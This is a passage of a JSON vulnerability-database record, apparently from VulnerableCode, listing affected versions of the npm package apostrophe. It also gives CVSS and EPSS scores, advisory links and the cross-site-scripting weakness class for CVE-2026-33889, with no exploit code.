rabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.14.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989066?format=json","purl":"pkg:npm/apostrophe@4.14.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.14.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989067?format=json","purl":"pkg:npm/apostrophe@4.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.15.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989068?format=json","purl":"pkg:npm/apostrophe@4.15.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.15.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989069?format=json","purl":"pkg:npm/apostrophe@4.15.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.15.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989070?format=json","purl":"pkg:npm/apostrophe@4.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.16.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989071?format=json","purl":"pkg:npm/apostrophe@4.17.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.17.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989072?format=json","purl":"pkg:npm/apostrophe@4.17.1-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.17.1-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989073?format=json","purl":"pkg:npm/apostrophe@4.17.1-alpha.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.17.1-alpha.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989074?format=json","purl":"pkg:npm/apostrophe@4.17.1-alpha.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.17.1-alpha.3"},{"url":"http://public2.vulnerablecode.io/api/packages/989075?format=json","purl":"pkg:npm/apostrophe@4.17.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.17.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989076?format=json","purl":"pkg:npm/apostrophe@4.18.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.18.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989077?format=json","purl":"pkg:npm/apostrophe@4.19.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.19.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989078?format=json","purl":"pkg:npm/apostrophe@4.20.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.20.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989079?format=json","purl":"pkg:npm/apostrophe@4.21.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.21.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989080?format=json","purl":"pkg:npm/apostrophe@4.21.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.21.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989081?format=json","purl":"pkg:npm/apostrophe@4.22.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.22.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989082?format=json","purl":"pkg:npm/apostrophe@4.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989083?format=json","purl":"pkg:npm/apostrophe@4.23.1-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.23.1-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989084?format=json","purl":"pkg:npm/apostrophe@4.24.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.24.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989085?format=json","purl":"pkg:npm/apostrophe@4.24.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.24.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989086?format=json","purl":"pkg:npm/apostrophe@4.25.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.25.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989087?format=json","purl":"pkg:npm/apostrophe@4.26.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.26.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989088?format=json","purl":"pkg:npm/apostrophe@4.26.1-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.26.1-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989089?format=json","purl":"pkg:npm/apostrophe@4.26.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.26.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989090?format=json","purl":"pkg:npm/apostrophe@4.26.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.26.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989091?format=json","purl":"pkg:npm/apostrophe@4.27.0-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.27.0-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989092?format=json","purl":"pkg:npm/apostrophe@4.27.0-alpha.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.27.0-alpha.2"},{"url":"http://public2.vulnerablecode.io/api/packages/989093?format=json","purl":"pkg:npm/apostrophe@4.27.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.27.0"},{"url":"http://public2.vulnerablecode.io/api/packages/989094?format=json","purl":"pkg:npm/apostrophe@4.27.1-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.27.1-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/989095?format=json","purl":"pkg:npm/apostrophe@4.27.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.27.1"},{"url":"http://public2.vulnerablecode.io/api/packages/114002?format=json","purl":"pkg:npm/apostrophe@4.28.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.28.0"},{"url":"http://public2.vulnerablecode.io/api/packages/1033488?format=json","purl":"pkg:npm/apostrophe@4.28.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@4.28.1"}],"references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33889","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02532","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02587","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02584","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33889"},{"reference_url":"https://github.com/apostrophecms/apostrophe","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apostrophecms/apostrophe"},{"reference_url":"https://github.com/apostrophecms/apostrophe/commit/6a89bdb7acdb2e1e9bf1429961a6ba7f99410481","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T11:26:46Z/"}],"url":"https://github.com/apostrophecms/apostrophe/commit/6a89bdb7acdb2e1e9bf1429961a6ba7f99410481"},{"reference_url":"https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-97v6-998m-fp4g","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-16T11:26:46Z/"}],"url":"https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-97v6-998m-fp4g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33889","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33889"},{"reference_url":"https://github.com/advisories/GHSA-97v6-998m-fp4g","reference_id":"GHSA-97v6-998m-fp4g","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-97v6-998m-fp4g"}],"weaknesses":[{"cwe_id":79,"name":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","description":"The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users."},{"cwe_id":937,"name":"OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013."},{"cwe_id":1035,"name":"OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities","description":"Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017."}],"exploits":[],"severity_range_score":"4.0 - 6.9","exploitability":"0.5","weighted_severity":"6.2","risk_score":3.1,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4twt-e5vw-m3em"}